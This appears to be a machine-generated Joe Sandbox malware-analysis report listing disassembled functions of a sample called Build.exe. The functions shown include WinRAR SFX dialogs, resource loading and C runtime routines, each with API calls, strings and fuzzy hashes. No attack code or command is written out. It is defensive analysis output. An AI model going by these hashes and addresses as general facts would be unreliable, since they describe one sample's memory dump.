Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ItemText$Dialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 1770891597-1315819833
Opcode ID: 923313fd29f87a99e3009ea5586d1026baf10e545c2e74e1bec635e94cc91474
Instruction ID: 20210fcf0f081ce50847ee67408b70a56ab7419711ecd53eba8015266fcb5455
Opcode Fuzzy Hash: 923313fd29f87a99e3009ea5586d1026baf10e545c2e74e1bec635e94cc91474
Instruction Fuzzy Hash: 5141B372A142086BEB30AB64DC49FFEB7ACEB88704F204429F605E7191DB74A9449F65

Function 0092E033 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00932663: _wcslen.LIBCMT ref: 00932669

Part of subcall function 0092D848: _wcsrchr.LIBVCRUNTIME ref: 0092D85F

_wcslen.LIBCMT ref: 0092E105
_wcslen.LIBCMT ref: 0092E14D

Strings

.rar, xrefs: 0092E04F, 0092E0A2
.sfx, xrefs: 0092E088
.exe, xrefs: 0092E079

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: b5ca4776be062029772f8d09fe3b666b7f2cd79a2553728313ce4d2e0ae21d75
Instruction ID: 633a55b3e236560103302074b235ed0e706169ac282698e3e459124c27331df2
Opcode Fuzzy Hash: b5ca4776be062029772f8d09fe3b666b7f2cd79a2553728313ce4d2e0ae21d75
Instruction Fuzzy Hash: F541233258877199C732AF30E8D6B3B77A8EF81748F10491EF8859B189E7A09D86C355

Function 0092DA1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0092DA59
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0092BD19,?,?,00000800,?,?,?,0092BCD4), ref: 0092DB02
_wcslen.LIBCMT ref: 0092DB70

Strings

UNC, xrefs: 0092DAE8
\\?\, xrefs: 0092DA90, 0092DADC, 0092DB38, 0092DB87

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 9cc38688f49750cf941f56cef230bbd2132008fe89c57831a707dcb276438731
Instruction ID: 8ba3af7343581c1434ba6c0b0593f1042ed268a73e984996b062fb19b88a8dfa
Opcode Fuzzy Hash: 9cc38688f49750cf941f56cef230bbd2132008fe89c57831a707dcb276438731
Instruction Fuzzy Hash: 3341C4319053616AD620EB60AC82EFFB3BCAFD9744F01086EF9C493149E7A49C84C762

Function 0093D9DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0093D9ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0093DA12
DeleteObject.GDI32(00000000), ref: 0093DA44
DeleteObject.GDI32(00000000), ref: 0093DA67

Part of subcall function 0093C652: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0093DA3D,00000066), ref: 0093C665
Part of subcall function 0093C652: SizeofResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C67C
Part of subcall function 0093C652: LoadResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C693
Part of subcall function 0093C652: LockResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C6A2
Part of subcall function 0093C652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0093DA3D,00000066), ref: 0093C6BD
Part of subcall function 0093C652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0093DA3D,00000066), ref: 0093C6CE
Part of subcall function 0093C652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0093C737
Part of subcall function 0093C652: GlobalUnlock.KERNEL32(00000000), ref: 0093C756
Part of subcall function 0093C652: GlobalFree.KERNEL32(00000000), ref: 0093C75D

Strings

], xrefs: 0093DA1A

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 71ad8417f1f4f49f07e777b6025d230baac4a20d5d9eef750f96bcfad5cc3caf
Instruction ID: cb3b4909521a736c1404c336bd17cda192add2672434097b89f6f859d7e07bbb
Opcode Fuzzy Hash: 71ad8417f1f4f49f07e777b6025d230baac4a20d5d9eef750f96bcfad5cc3caf
Instruction Fuzzy Hash: C501C072509A0166CB126BA4AD5AB7F7A7EABC2B51F240014F809B7391DF71DC05ABA0

Function 0093F950 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00921366: GetDlgItem.USER32(00000000,00003021), ref: 009213AA
Part of subcall function 00921366: SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0

EndDialog.USER32(?,00000001), ref: 0093F99B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0093F9B1
SetDlgItemTextW.USER32(?,00000066,?), ref: 0093F9C5
SetDlgItemTextW.USER32(?,00000068), ref: 0093F9D4

Strings

RENAMEDLG, xrefs: 0093F968

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: ddc32234cb38a5c3eee1a8d655d65de30ac2718c22f7de184e93ea7e2ee34a11
Instruction ID: b3ab0a2d5c4e99a8631a58ae5f7a3b21716e4f872e80456992b207def8af3789
Opcode Fuzzy Hash: ddc32234cb38a5c3eee1a8d655d65de30ac2718c22f7de184e93ea7e2ee34a11
Instruction Fuzzy Hash: 27014733A9C310BBD2118F689D0CF67BB5DFB59B02F208421F341A26D0C662DA049F75

Function 0094A6C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0094A676,?,?,0094A616,?,0095F7B0,0000000C,0094A76D,?,00000002), ref: 0094A6E5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0094A6F8
FreeLibrary.KERNEL32(00000000,?,?,?,0094A676,?,?,0094A616,?,0095F7B0,0000000C,0094A76D,?,00000002,00000000), ref: 0094A71B

Strings

mscoree.dll, xrefs: 0094A6DE
CorExitProcess, xrefs: 0094A6F0

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c6378d3afcd95f151b43d61e16d72b9625f81a0ddce2a0ef38a1d3cf55174f66
Instruction ID: 1c7120ac2b2c955cc8cdbebfd8d5f82b2252caedf9de04e408373df98751b697
Opcode Fuzzy Hash: c6378d3afcd95f151b43d61e16d72b9625f81a0ddce2a0ef38a1d3cf55174f66
Instruction Fuzzy Hash: B7F0AF30A55208FBDF109FA2DC49FAEBFB9EB48746F400169F805A72A0CB705D40DB81

Function 009451FA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 009452C1
___AdjustPointer.LIBCMT ref: 009452E4
_abort.LIBCMT ref: 00945332
___AdjustPointer.LIBCMT ref: 00945380

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: ea2ddc88a10dda33baf9fc5c89bcc0c3ce3a15a3c5d8f91f1d173ec6199d30d4
Instruction ID: 7fe1433e34c4c0dbcd42278c194115ba4e634665e9b62db80db0071da4c8a08b
Opcode Fuzzy Hash: ea2ddc88a10dda33baf9fc5c89bcc0c3ce3a15a3c5d8f91f1d173ec6199d30d4
Instruction Fuzzy Hash: 2F51D272601A06EFDB29CF94D841F6EB3A8EF84750F16452EF81597292D7B1EC80CB90

Function 0094E580 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0094E589
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0094E5AC

Part of subcall function 0094BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A24,?,0000015D,?,?,?,?,00947F00,000000FF,00000000,?,?), ref: 0094BCC0

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0094E5D2
_free.LIBCMT ref: 0094E5E5
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0094E5F4

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 5678e2f5396ac50c83cecd5a3b87833d73b53a894f95811d597087edbdf11527
Instruction ID: 0c423cc6d644da4c41dbc65cd728f830df300333282b1f0ffd7d0aa00fe399b2
Opcode Fuzzy Hash: 5678e2f5396ac50c83cecd5a3b87833d73b53a894f95811d597087edbdf11527
Instruction Fuzzy Hash: 3801DF726096117F2B2157BB6C89C7B6A6DFEC2BAA3140129B905C3201FE648D02A2B0

Function 0094BA29 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0094BC80,0094D7D8,?,0094B9D3,00000001,00000364,?,0094688D,?,?,009650C4), ref: 0094BA2E
_free.LIBCMT ref: 0094BA63
_free.LIBCMT ref: 0094BA8A
SetLastError.KERNEL32(00000000,?,009650C4), ref: 0094BA97
SetLastError.KERNEL32(00000000,?,009650C4), ref: 0094BAA0

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: cb824396ff76bc5d26cfddde2e2a2d7a68a195b44594ae2db10453850599b421
Instruction ID: bb6c4fd01b843dfc6cf822c7425061ef0777d705be8df6dde7ed5425d992fef8
Opcode Fuzzy Hash: cb824396ff76bc5d26cfddde2e2a2d7a68a195b44594ae2db10453850599b421
Instruction Fuzzy Hash: 9301F436209B01AB8616A7365D86F6B21EEDBC13767200928F51993291EF65CC026220

Function 00932FC9 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 009332AF: ResetEvent.KERNEL32(?), ref: 009332C1
Part of subcall function 009332AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 009332D5

ReleaseSemaphore.KERNEL32(?,00000040,00000000,1C667296,?,?,00000001,?,009552FF,000000FF,?,009343C0,?,00000000,?,00924766), ref: 00933007
CloseHandle.KERNEL32(?,?,?,009343C0,?,00000000,?,00924766,?,?,?,00000000,?,?,?,00000001), ref: 00933021
DeleteCriticalSection.KERNEL32(?,?,009343C0,?,00000000,?,00924766,?,?,?,00000000,?,?,?,00000001,?), ref: 0093303A
CloseHandle.KERNEL32(?,?,009343C0,?,00000000,?,00924766,?,?,?,00000000,?,?,?,00000001,?), ref: 00933046
CloseHandle.KERNEL32(?,?,009343C0,?,00000000,?,00924766,?,?,?,00000000,?,?,?,00000001,?), ref: 00933052

Part of subcall function 009330CA: WaitForSingleObject.KERNEL32(?,000000FF,009331E7,?,?,0093325F,?,?,?,?,?,00933249), ref: 009330D0
Part of subcall function 009330CA: GetLastError.KERNEL32(?,?,0093325F,?,?,?,?,?,00933249), ref: 009330DC

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 9bec4fa22d43c10494a8f4a387903d4f77748dbe2da061735d972738d4bc0da3
Instruction ID: 225358b6a11864896a4e563e68bef297ae59412e5409e8d4d1d0c0601da9c507
Opcode Fuzzy Hash: 9bec4fa22d43c10494a8f4a387903d4f77748dbe2da061735d972738d4bc0da3
Instruction Fuzzy Hash: F611AD72404B44EFC7229F76DC84BC6BBA9FB08712F404929E16AA31A0CB757A049B50

Function 0094EE4F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0094EE67

Part of subcall function 0094BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?), ref: 0094BB10
Part of subcall function 0094BAFA: GetLastError.KERNEL32(?,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?,?), ref: 0094BB22

_free.LIBCMT ref: 0094EE79
_free.LIBCMT ref: 0094EE8B
_free.LIBCMT ref: 0094EE9D
_free.LIBCMT ref: 0094EEAF

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0f66a55dfbe51a7ebc5a2c2830325793856f059f54ba02d535998bd5f9890008
Instruction ID: 15f681b1ba0d56a3cd48eb2d76fcd395d86b35d17b29e42250feeca14afcc912
Opcode Fuzzy Hash: 0f66a55dfbe51a7ebc5a2c2830325793856f059f54ba02d535998bd5f9890008
Instruction Fuzzy Hash: 37F03032518600EFC765EB69F886D9B77EEBA407107640C1AF14ED7940CFB1FC808A64

Function 0094B160 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0094B17E

Part of subcall function 0094BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?), ref: 0094BB10
Part of subcall function 0094BAFA: GetLastError.KERNEL32(?,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?,?), ref: 0094BB22

_free.LIBCMT ref: 0094B190
_free.LIBCMT ref: 0094B1A3
_free.LIBCMT ref: 0094B1B4
_free.LIBCMT ref: 0094B1C5

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 07842b49681e7b7070ae13d59e21f250ae2fcc1071d3e091266a52037c807424
Instruction ID: fbb415b06a9ceaf217696d65c94f6c68de3b02c6172e39776e2f2540f88726e6
Opcode Fuzzy Hash: 07842b49681e7b7070ae13d59e21f250ae2fcc1071d3e091266a52037c807424
Instruction Fuzzy Hash: BEF0B77082C6209BCA52AF15EC019883BB5FB54725301465AF5269B361CBB78842AFD1

Function 00933748 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00933910
_swprintf.LIBCMT ref: 009339BF

Strings

%ls, xrefs: 00933795, 009337AB
%s: %s, xrefs: 0093391F

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 8743ced6c0bbd9a0676b361964e5086aa1ac6af7ece1882fc18acd9c7921e2dd
Instruction ID: c78dd454773ded60b88cffa79493757800f9f8c9e39ff260ed081ad6fda24ee9
Opcode Fuzzy Hash: 8743ced6c0bbd9a0676b361964e5086aa1ac6af7ece1882fc18acd9c7921e2dd
Instruction Fuzzy Hash: 9951DCB52C8305FAF6215B948D42F3AB6A9AB45F00F20CD07F7CB640E1C6A59750AF56

Function 0094A7C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe,00000104), ref: 0094A800
_free.LIBCMT ref: 0094A8CB
_free.LIBCMT ref: 0094A8D5

Strings

C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe, xrefs: 0094A7F7, 0094A7FE, 0094A82D, 0094A865

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe
API String ID: 2506810119-2276182090
Opcode ID: 6c3f02056e157c18cda6b15f791bf106972dc8aa4f393f9a9f5b3400eddf147e
Instruction ID: 229edc265f5b2984655f6ce01aa6264f5443fbd72ec7a677371e9486e770b48a
Opcode Fuzzy Hash: 6c3f02056e157c18cda6b15f791bf106972dc8aa4f393f9a9f5b3400eddf147e
Instruction Fuzzy Hash: 3D315E71A44218EFDB21DF99DC85E9EBBFCEB85310F14406AF9049B311D6748E42DBA2

Function 009457F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0094581B
_abort.LIBCMT ref: 00945926

Strings

MOC, xrefs: 0094582D
RCC, xrefs: 00945835

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: e6242152112e82acb325bd1ac8fb151f50c5e317f30ce141094d73b0a45032fd
